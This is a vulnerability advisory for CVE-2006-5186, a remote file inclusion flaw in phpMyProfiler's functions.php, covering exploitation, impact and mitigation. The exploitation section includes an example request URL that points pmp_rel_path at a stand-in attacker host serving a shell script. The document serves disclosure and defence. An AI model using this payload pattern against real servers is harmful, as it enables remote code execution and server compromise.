CVE-2006-5186

Vulnerability

PHP remote file inclusion vulnerability exists in functions.php of phpMyProfiler 0.9.6 and earlier. The application unsafely uses the $pmp_rel_path parameter in a require_once() call without proper sanitization. When the PHP configuration directive register_globals is enabled, an attacker can supply a remote URL in the pmp_rel_path parameter, causing the server to include and execute arbitrary PHP code from a remote location [1][2].

Exploitation

An attacker needs only network access to the vulnerable server and the ability to craft an HTTP request. No authentication is required. The exploitation step is straightforward: send a GET or POST request to functions.php with the pmp_rel_path parameter set to a URL pointing to an attacker-controlled PHP script (e.g., http://site.com/[path]/functions.php?pmp_rel_path=http://evil.com/shell.txt). The server will include and execute the remote code [2].

Impact

Successful exploitation allows remote attackers to execute arbitrary PHP code on the target server. This results in complete compromise of the confidentiality, integrity, and availability of the application and potentially the underlying server, depending on the permissions of the web server process. The attacker can read, write, or delete files, execute system commands, access databases, and pivot to other systems on the same network.

Mitigation

No official patch has been released for this vulnerability; it affects phpMyProfiler 0.9.6 and earlier. The primary mitigation is to disable register_globals in php.ini (set to Off). Additionally, users should consider upgrading to a later version if available, or removing the application entirely if unsupported. This CVE is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog.